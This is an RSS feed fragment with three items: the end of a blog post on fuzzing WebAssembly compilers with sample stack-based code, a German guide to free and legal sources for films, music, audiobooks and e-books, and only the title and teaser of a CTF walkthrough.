dummy constants inserted while ensuring validity. That could include storing
values to memory or globals instead of <code class="language-plaintext highlighter-rouge">drop</code>ing them when possible. It could
even include liberating ourselves from the stack-focused paradigm we’ve had thus
far.</p>

<p>WebAssembly is a stack-based language and so it is natural that our approaches
have focused on producing stack-y code. But, in practice, optimizing WebAssembly
compilers like Wasmtime’s use a <a href="https://en.wikipedia.org/wiki/Static_single-assignment_form">static single-assignment</a> intermediate
representation, and erase the operand stack early in their compilation
pipelines. Therefore, from these compilers’ point of view, the following two
WebAssembly snippets are identical:</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">;; `x = a + (b * c)` in a "stack-y" encoding and</span>
<span class="c1">;; without temporary locals.</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">b</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">c</span>
<span class="nf">i32.mul</span>
<span class="nf">i32.add</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">x</span>

<span class="c1">;; `x = a + (b * c)` in a "non-stack-y" encoding</span>
<span class="c1">;; that uses temporary locals for every operation.</span>
<span class="c1">;;</span>
<span class="c1">;; Equivalent of</span>
<span class="c1">;;</span>
<span class="c1">;;     temp0 = b * c</span>
<span class="c1">;;     temp1 = a + temp0</span>
<span class="c1">;;     x = temp1</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">b</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">c</span>
<span class="nf">i32.mul</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">temp0</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">temp0</span>
<span class="nf">i32.add</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">temp1</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">temp1</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">x</span>
</code></pre></div></div>

<p>Producing code that uses many temporaries in this manner might be easier than
code that doesn’t, but, more importantly, it may enable better reuse of
already-computed subexpressions, emit less dead code, and ultimately produce
more interesting data-flow graphs that better exercise the deep innards of the
compiler.</p>

<p>A final vein of interesting follow-up work to mine would be comparing
<code class="language-plaintext highlighter-rouge">arbitrary</code>-based generators and <code class="language-plaintext highlighter-rouge">mutatis</code>-based mutators for structured inputs
that are not programming languages and when the SUT we are fuzzing is not a
compiler. Do we see these same results when, for example, producing PNG images
to fuzz an image-transformation library?</p>

<p><a href="https://github.com/fitzgen/fuzz-experiment">Here is the source code for this experiment, including the three generators,
one mutator, raw benchmark data, and benchmarking harness.</a> The <code class="language-plaintext highlighter-rouge">README</code>
includes instructions on running the benchmarks yourself.</p>

<hr>

<div class="footnotes">
  <ol>
    <li>
      <p>WebAssembly’s stack-based instructions encode an expression tree
— <code class="language-plaintext highlighter-rouge">local.get $a; local.get $b; local.get $c; i32.add; i32.mul</code> is
isomorphic to <code class="language-plaintext highlighter-rouge">a * (b + c)</code> — so the experiment should be relevant and
applicable to any other generator or mutator for a programming language with
expressions, even if it might not appear so at first glance. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:applicable">↩</a></p>
    </li>
    <li>
      <p>Ignoring its rule-guided bit, which is orthogonal and could be
applied to <code class="language-plaintext highlighter-rouge">bottom_up</code> as well. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:rule-guided">↩</a></p>
    </li>
    <li>
      <p>Structure-aware fuzzing and property-based testing are <a href="https://docs.rs/mutatis/latest/mutatis/_guide/comparisons/index.html#comparison-to-property-based-testing">basically the
same</a>:
convergent evolution from different communities. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:pbt">↩</a></p>
    </li>
  </ol>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ohne Netflix, Spotify & Audible: Musik, Videos und Bücher gratis und legal]]></title>
<description><![CDATA[Das Netflix-Abo kostet aktuell mindestens 5 Euro im Monat, Disney+ 7 Euro, Amazon Prime mit Videostreaming wenigstens 9 Euro. Für Spotify mit Musik, Podcasts und Hörbüchern dürfen Sie noch mal 13 Euro monatlich hinblättern, Audible schlägt mit 7 Euro zu Buche, und für Vielleser kommt dann noch be...]]></description>
<link>https://tsecurity.de/de/3560384/windows-tipps/ohne-netflix-spotify-audible-musik-videos-und-buecher-gratis-und-legal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3560384/windows-tipps/ohne-netflix-spotify-audible-musik-videos-und-buecher-gratis-und-legal/</guid>
<pubDate>Sun, 31 May 2026 09:38:25 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das <a href="https://www.netflix.com/signup?locale=de-DE" target="_blank" rel="noreferrer noopener">Netflix-Abo</a> kostet aktuell mindestens 5 Euro im Monat, <a href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=rss" target="_blank" rel="noreferrer noopener">Disney+</a> 7 Euro, <a href="https://www.amazon.de/amazonprime?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Amazon Prime</a> mit Videostreaming wenigstens 9 Euro. Für <a href="https://open.spotify.com/intl-de" target="_blank" rel="noreferrer noopener">Spotify</a> mit Musik, Podcasts und Hörbüchern dürfen Sie noch mal 13 Euro monatlich hinblättern, <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=14444&amp;clickref=rss&amp;ued=https://www.audible.de/" target="_blank" rel="noreferrer noopener">Audible</a> schlägt mit 7 Euro zu Buche, und für Vielleser kommt dann noch beispielsweise <a href="https://www.amazon.de/kindle-dbs/hz/subscribe/ku/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Kindle Unlimited</a> für 12 Euro oder <a href="https://www.readly.co/de/offers?srsltid=AfmBOooloNEMK34x5aBG8Ml_lpKvbQ2PZTL-o8BDyem_8qS74qrzHFmd" target="_blank" rel="noreferrer noopener">Readly</a> für 15 Euro dazu.</p>



<p>Wer also seiner Film-, Serien-, Musik- und Leseleidenschaft unbegrenzt nachkommen möchte, darf im Monat ordentlich blechen – vor allem, da man seinen Geschmack mittlerweile nicht mehr nur mit einem Anbieter abdecken kann.</p>



<p>Wer sich dem komplett entziehen möchte, der findet im Internet verschiedene Quellen für kostenlose Inhalte. Das Angebot ist dann zwar nicht immer das Aktuellste, und meist fehlt auch die Original-Tonspur. Dafür müssen Sie aber auch die vollkommen willkürliche Preisgestaltung der großen Streaming-Dienste nicht mehr mitmachen, und Sie dürfen die Inhalte teils sogar lokal speichern.</p>



<p>In unserem Ratgeber stellen wir Ihnen die besten Anbieter für kostenlose Filme, Serien, Musik, Hörbücher und Audiobooks vor. Die Mediatheken der Fernsehanstalten sowie die kostenlosen Angebote der bekannten Streaming-Plattformen berücksichtigen wir dabei nicht.</p>



<h2 class="wp-block-heading toc">Kostenlose Filme: Netzkino und Internet Archive</h2>



<p>Einer der bekanntesten Anbieter von kostenlosen und legalen Filmen ist <a href="http://www.netzkino.de/" target="_blank" rel="noreferrer noopener">Netzkino</a>. Er finanziert sich in der Free-Variante durch Werbung, die beim Plus-Abo für 1,99 Euro pro Monat verschwindet. </p>



<p>Netzkino sortiert sein Angebot nach Genres und bietet eine Suchfunktion. Das Angebot von Netzkino ist vielseitig: Neben Klassikern wie „Hotel New Hampshire“ oder der Robocop-Serie finden sich auch die Kostümromanze „Sommersby“, die Körpertausch-Komödie „Switch“ oder der Kultquatsch „Sharknado“.</p>



<p>Downloads sind nur über die kostenlose App fürs Smartphone möglich. Leider hat die jedoch ihre letzte Aktualisierung 2023 erhalten und funktioniert nicht auf jedem Handymodell.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41fee2d7"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-Netzkino.png?w=1200" alt="Gratis Inhalte Netzkino" class="wp-image-3137962" width="1200" height="624" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Netzkino bietet viele kostenlose Filmklassiker, die praktischerweise nach Genre sortiert sind und sich durchsuchen lassen. Der Dienst finanziert sich über Werbung, für überschaubare 1,99 Euro im Monat lässt sich die aber auch abschalten.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Einen großen Fundus an kostenlosen Filmen und vereinzelt auch Serien finden Sie beispielsweise im englischsprachigen <a href="https://archive.org/details/moviesandfilms" target="_blank" rel="noreferrer noopener">Internet Archive</a>. Es ist eine gemeinnützige Bibliothek mit einer allgemein zugänglichen Sammlung von digitalisierten Medien aller Art, darunter auch Videos, Printartikel, Software und Musik, die es sich zur Aufgabe gemacht hat, möglichst viel des „öffentlichen Internets“ zu archivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41fee987"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-Internet-Archive.png?w=1200" alt="Gratis Inhalte Internet Archive" class="wp-image-3137958" width="1200" height="688" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Das Internet Archive hat ebenfalls eine Sammlung an Filmen im Bestand, die jedoch – wie alle Inhalte – von Nutzern zur Verfügung gestellt werden. Dementsprechend ist die Qualität sehr wechselhaft, und auch die Frage nach dem Urheberrecht ist nicht immer geklärt.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Das Filmangebot ist dabei thematisch sortiert, etwa in die Kategorien „Film noir“, „Sci-Fi/Horror“ und „Comedy Films“ und lässt sich auch herunterladen. Da die Inhalte jedoch meist über Webcrawler kommen, aber auch von Nutzern hochgeladen werden, ist die Qualität sehr unterschiedlich, und zudem sehen sich die Betreiber immer wieder mit Copyright-Klagen konfrontiert. </p>



<p>Sie sollten hier also etwas vorsichtiger sein. Dennoch finden Sie im Internet Archive verschiedene Klassiker wie „Scarface“ von 1932, „Monty Python and the Holy Grail“, aber auch die erste Staffel der „Addams Family“. Für konkrete Filmwünsche steht eine Suchfunktion bereit.</p>



<h2 class="wp-block-heading toc">Filme auf den Youtube-Channels von Produktionsfirmen</h2>



<p>Auf <a href="https://www.youtube.com/" target="_blank" rel="noreferrer noopener">Youtube</a> gibt es viele Medienunternehmen und andere Anbieter, die komplette Filme legal anbieten. Beispielsweise finden sich einige Inhalte des französischen Medienunternehmens Studiocanal auf Youtube, zu dem auch das Label Arthouse gehört.</p>



<p><a href="http://www.youtube.com/@studiocanalgermany/videos" target="_blank" rel="noreferrer noopener">Studiocanal Deutschland</a> betreibt einen eigenen Kanal mit ganzen Spielfilmen, darunter etwa „Die Uhr läuft ab“ mit Sean Connery, „Simpatico“ mit Jeff Bridges und Nick Nolte oder „Ein ungleiches Paar“ mit Michael Douglas. Aber auch die ersten sieben Teile der „Ist ja irre“-Reihe aus den 60er-Jahren und Kultstreifen wie „Gefährliche Brandung“ mit Keanu Reeves und Patrick Swayze finden Sie dort.</p>



<p>Auch <a href="https://www.youtube.com/@Moviedome/videos" target="_blank" rel="noreferrer noopener">Moviedome </a>hat sich auf Youtube auf Filme spezialisiert, etwa „Das Philadelphia Experiment“ mit Michael Paré, die beiden „Wayne’s World“-Teile mit Mike Myers und Dana Carvey sowie „Der Galgenstrick“ mit Jack Nicholson.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41fef10f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-Movie-dome.png?w=1200" alt="Gratis Inhalte Movie dome" class="wp-image-3137960" width="1200" height="611" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Produktionsstudios wie Studiocanal und Lizenznehmer wie Moviedome (Bild) betreiben auf Youtube eigene Channels, über die sich komplette Filme kostenlos streamen lassen. Sind Sie Youtube-Premium-Kunde, dürfen Sie die Inhalte auch herunterladen.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Horrorfans kommen bei <a href="http://www.youtube.com/@WatchMoviesNow" target="_blank" rel="noreferrer noopener">Watch Movies Now!</a> auf ihre Kosten. Das teils ungeschnittene englischsprachige Angebot wird jeden Tag erweitert und laut eigenen Angaben von erfahrenen Filmproduzenten kuratiert. </p>



<p>Die angebotenen Schocker tragen so klangvolle Titel wie „Coffin 2: Paralyzed by Fear“, „Bats: Deadly Plague“ oder „Evolution of Evil“. Vom gleichen Anbieter gibt’s auch noch <a href="http://www.youtube.com/@WatchActionNow" target="_blank" rel="noreferrer noopener">Actionfilme</a>, <a href="http://www.youtube.com/@WatchThrillerMovies" target="_blank" rel="noreferrer noopener">Thriller</a>, <a href="http://www.youtube.com/@WATCHWESTERNMOVIESNOW-pr8zd" target="_blank" rel="noreferrer noopener">Western</a> und <a href="http://www.youtube.com/@WatchDramaNow-vw2ev" target="_blank" rel="noreferrer noopener">Dramen</a>. Allerdings ist die Auswahl auf diesen Youtube-Channels nur etwas für Genrefans. Bekannte Filme finden sich dort weniger.</p>



<p>Der Download von Youtube-Inhalten ist grundsätzlich nur Abonnenten von <a href="https://www.youtube.com/premium" target="_blank" rel="noreferrer noopener">Youtube Premium</a> (13 Euro monatlich) vorbehalten, die Wiedergabe ausschließlich über Youtube möglich. Möchten Sie einen Film nur ansehen, ist dies auch ohne Premium-Abo möglich.</p>



<h2 class="wp-block-heading toc">Musik: Künstler-Plattformen und Elektromixes ohne Abo</h2>



<p>Echte Alternativen zu <a href="https://open.spotify.com/intl-de" target="_blank" rel="noreferrer noopener">Spotify</a>, <a href="https://www.deezer.com/de/" target="_blank" rel="noreferrer noopener">Deezer</a> oder <a href="https://music.amazon.de/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Amazon Music</a> sind relativ schwer zu finden, da sich Musik aufgrund von Lizenz- und Gema-Bestimmungen nicht einfach so streamen und herunterladen lässt. </p>



<p>Wer sich jedoch auch abseits von Charts und bekannten Künstlern bewegen kann, der findet etwa in <a href="https://soundcloud.com/" target="_blank" rel="noreferrer noopener">Soundcloud</a> eine Plattform für Künstler, die dort ihre eigene Musik veröffentlichen.</p>



<p>Soundcloud ist für viele Systeme verfügbar, darunter PC, Mobilgeräte, aber auch Chromecast, Android TV und Apple Carplay. Downloads stehen für angemeldete Mitglieder prinzipiell zur Verfügung, jedoch dürfen Künstler die Funktion auch deaktivieren. Auf der Startseite dürfen Sie nach Künstlern suchen, sich angesagte Playlists anzeigen lassen oder hervorgehobene Songs direkt wiedergeben.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41fef96c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-Soundcloud.png?w=1200" alt="Gratis Inhalte Soundcloud" class="wp-image-3137961" width="1200" height="739" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Soundcloud dient Künstlern dazu, ihre eigene Musik der Öffentlichkeit zu präsentieren. Um sich im Angebot der meist (noch) unbekannten Künstler zurechtzufinden, gibt’s Playlisten und Empfehlungen.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Besonders auf DJ-Mixes, Liveshows und Radiosendungen aus den Genres Techno, Hiphop, Chill-out und House hat sich <a href="http://www.mixcloud.com/" target="_blank" rel="noreferrer noopener">Mixcloud</a> spezialisiert. Fans elektronischer Musik finden hier zudem Empfehlungen und plattforminterne Charts, wobei angemeldete Nutzer auch selbst Inhalte hochladen dürfen. Mixcloud ist werbefinanziert, die werbefreie Version kostet 7 Euro pro Monat und enthält dann unter anderem auch eine Download-Funktion. Mixcloud ist auch als App verfügbar.</p>



<h2 class="wp-block-heading toc">Hörspiele und Hörbücher: Reichlich Auswahl in vielen Genres</h2>



<p>Obwohl wir für diesen Artikel Mediatheken und kostenlose Angebote von Streaming-Diensten außen vor lassen wollten, kommen wir um <a href="https://www.ardsounds.de/" target="_blank" rel="noreferrer noopener">ARD Sounds</a> nicht herum. Denn die ehemals „ARD Audiothek“ genannte Plattform der Sendeanstalt liefert kostenlose Hörspiele von höchster Qualität, auch gerne mal in Form von Podcasts.</p>



<p>So präsentiert beispielsweise Bastian Pastewka in seinem Podcast „Kein Mucks!“ ausgesuchte Krimihörspiele, darunter etwa „Kriminalrat Obermoos“-Ratekrimis, verschiedene Poirot-Fälle und Hörspielfassungen nach Francis Durbridge, die vom Moderator mit zahlreichen kuriosen Hintergrundinfos ergänzt werden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41ff0011"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-ARD-Sounds.png?w=1200" alt="Gratis Inhalte ARD Sounds" class="wp-image-3137963" width="1200" height="611" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei ARD Sounds finden Hörspielfreunde reichlich Auswahl. Neben Podcasts mit Krimis, Komödien und mehr gibt’s auch einige Hörbücher. Alle Inhalte sind kostenlos und lassen sich herunterladen.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Auch alle Hörspiele um Professor van Dusen alias „Die Denkmaschine“ finden sich in einer eigenen, gleichnamigen Sammlung bei ARD Sounds, und der Podcast „Auf der Spur“ erfreut Krimifans mit sogenannten Ermittlerkrimis, in denen Kommissar Maigret, Commissario Brunetti, Philip Marlowe, Tabor Süden &amp; Co. ihrer Arbeit nachgehen. </p>



<p>Aber auch William von Baskerville darf im prominent besetzten Vierteiler „Der Name der Rose“ ermitteln, und wer vom sonntäglichen Fernseh-„Tatort“ nicht genug bekommt, findet bei ARD Sounds den „Radio-Tatort“ mit zahlreichen Fällen, die monatlich erweitert werden.</p>



<p>Hörbücher sind bei ARD Sounds dagegen nur wenige verfügbar, hier kommen primär Freunde der klassischen Literatur auf ihre Kosten. So stehen etwa Emily Brontës „Sturmhöhe“, „Vernunft und Gefühl“ von Jane Austen oder „Der Seewolf“ von Jack London als Mehrteiler zur Verfügung. </p>



<p>Praktisch: Alle Inhalte lassen sich herunterladen, darüber hinaus ist ARD Sounds auch als App fürs Smartphone erhältlich.</p>



<p>Deutlich mehr kostenlose Hörbücher gibt’s bei <a href="http://www.gratis-hoerspiele.de/" target="_blank" rel="noreferrer noopener">Gratis-Hoerspiele.de</a>. Sie rufen das Komplettangebot dort über „Downloads &gt; Alle Hörbuch-Downloads“ auf. Bekannte Titel und Sprecher finden Sie hier zwar in erster Linie im Rahmen von Kooperationen mit anderen Plattformen. </p>



<p>Insgesamt reicht das Angebot jedoch von Hörbüchern für Kinder über Sherlock-Holmes- und Perry-Rhodan-Geschichten bis hin zu Audiobooks von Edgar Wallace und beispielsweise einer 37-stündigen Fassung von Diana Gabaldons erstem Outlander-Band.</p>



<p><a href="http://www.vorleser.net/" target="_blank" rel="noreferrer noopener">Vorleser.net</a> geht einen etwas anderen Weg als ARD Sounds und Hoerspiele.de. Hier dürfen Sie der Plattform überlassen, was sie Ihnen vorschlägt: Sie geben auf der Startseite lediglich eine Stimmung ein – etwa spannend, motivierend, märchenhaft für Kinder, beruhigend oder lehrreich – und erhalten daraufhin eine Auswahl an passenden Titeln. Alternativ finden Sie unter „Entdecken“ verschiedene Filter, die Sie zum passenden Inhalt führen.</p>



<p>Die Inhalte von Vorleser.net stammen hauptsächlich von Autoren, die bereits seit über 70 Jahren tot sind, deren Werke also „gemeinfrei“ sind und nicht mehr unter das Urheberrecht fallen. Dementsprechend stehen Ihnen neben Märchen und Erzählungen von Autoren wie Edgar Allan Poe und Sir Arthur Conan Doyle vor allem weitere Klassiker zur Auswahl. Aber auch ein etwa einstündiger Krimi von Friedrich Ani findet sich darunter, dieser dann lizenziert.</p>



<p>Die mehr als 750 Produktionen kommen dabei aus dem eigenen Tonstudio des Buchfunk-Verlags, der Vorleser.net betreibt. Einige davon wurden bereits mit dem Deutschen Hörbuchpreis ausgezeichnet.</p>



<h2 class="wp-block-heading toc">Bücher: Nur gemeinfreie Titel</h2>



<p>Die wohl bekannteste Sammlung kostenloser Bücher ist das amerikanische <a href="http://www.gutenberg.org/" target="_blank" rel="noreferrer noopener">Project Gutenberg</a>, welches 1971 gegründet wurde und mittlerweile von einem gemeinnützigen Verein getragen wird. </p>



<p>Die über 75.000 angebotenen, zumeist englischsprachigen Titel sind gemäß US-Recht gemeinfrei, wobei sich die Definition von der in Deutschland unterscheidet: Während in Deutschland das Urheberrecht eines Werks 70 Jahre nach dem Tod des Autors erlischt, errechnet sich dieser Zeitpunkt laut US-Recht auf 56 Jahre nach der Veröffentlichung des Werks.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1be41ff0905"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Gratis-Inhalte-Project-Gutenberg.png?w=1200" alt="Gratis Inhalte Project Gutenberg" class="wp-image-3137959" width="1200" height="624" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die digitale Bibliothek Project Gutenberg enthält über 75.000 Bücher, die gemäß US-Recht gemeinfrei sind, also nicht mehr dem US-Urheberrecht unterliegen. Die größtenteils englischsprachigen Bücher lassen sich auch herunterladen.</p></figcaption></figure><p class="imageCredit">Verena Ottmann</p></div>



<p>Die Betreiber der digitalen Bibliothek betonen daher, dass sich Nutzer selbst um das in ihrem Land geltende Urheberrecht kümmern müssen, falls sie Bücher von der Plattform herunterladen. Das Project Gutenberg ist auch über das bereits erwähnte <a href="https://archive.org/details/gutenberg" target="_blank" rel="noreferrer noopener">Internet Archive</a> aufrufbar. Der Reiter „Text“ führt Sie dort zudem zu den Beständen verschiedener amerikanischer und kanadischer Bibliotheken sowie der Public Library of India. Für den mobilen Zugriff steht Ihnen die <a href="https://tinyurl.com/32wxmta6" target="_blank" rel="noreferrer noopener">App Open Library</a> zur Verfügung.</p>



<p>Übrigens: Das <a href="https://projekt-gutenberg.org/" target="_blank" rel="noreferrer noopener">deutsche Projekt Gutenberg</a>, das ausschließlich deutschsprachige gemeinfreie Bücher enthält, hat – abgesehen von der Namensähnlichkeit – nichts mit dem Project Gutenberg zu tun. Auch ist hier das Herunterladen der Bücher nicht möglich, dafür verkaufen die Betreiber DVDs.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersploit 1 Walkthrough — OffSec | Beginner Guide & Screenshots]]></title>
<description><![CDATA[Cybersploit 1 Walkthrough — OffSec | Beginner Guide & ScreenshotsI’m a professional penetration tester with hands-on red-team experience and OSCP-style practice. I treat every engagement — even CTF boxes — with the same discipline: methodical reconnaissance, prioritized attack paths, and clean, r...]]></description>
